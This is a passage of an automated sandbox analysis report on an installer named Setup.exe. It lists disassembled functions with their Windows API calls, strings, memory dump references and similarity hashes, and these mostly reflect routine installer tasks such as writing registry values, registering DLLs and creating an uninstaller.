                                                                                                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                        • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                        • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                        • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                        • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                        • String ID: F$N$open
                                                                                                                                                                        • API String ID: 3928313111-1104729357
                                                                                                                                                                        • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                        • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                        • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                        • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                        Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                        • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                          • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                        • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                        • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                        • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                        • API String ID: 565278875-3368763019
                                                                                                                                                                        • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                        • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                        • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                        • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                        • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                        • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                        • String ID: F
                                                                                                                                                                        • API String ID: 941294808-1304234792
                                                                                                                                                                        • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                        • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                        • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                        • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                        Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                        • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        Strings
                                                                                                                                                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                        • API String ID: 1641139501-220328614
                                                                                                                                                                        • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                        • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                        • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                        • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                        Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                        • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                        • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                        • API String ID: 3734993849-3206598305
                                                                                                                                                                        • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                        • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                        • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                        • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                        Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                        Strings
                                                                                                                                                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                        • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                        • API String ID: 3294113728-3145124454
                                                                                                                                                                        • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                        • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                        • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                        • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                        Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                        Strings
                                                                                                                                                                        • `G, xrefs: 0040246E
                                                                                                                                                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                        • API String ID: 1033533793-4193110038
                                                                                                                                                                        • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                        • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                        • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                        • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                        Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                        • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                        • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                        • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2320649405-0
                                                                                                                                                                        • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                        • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                        • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                        • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                        Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FF9
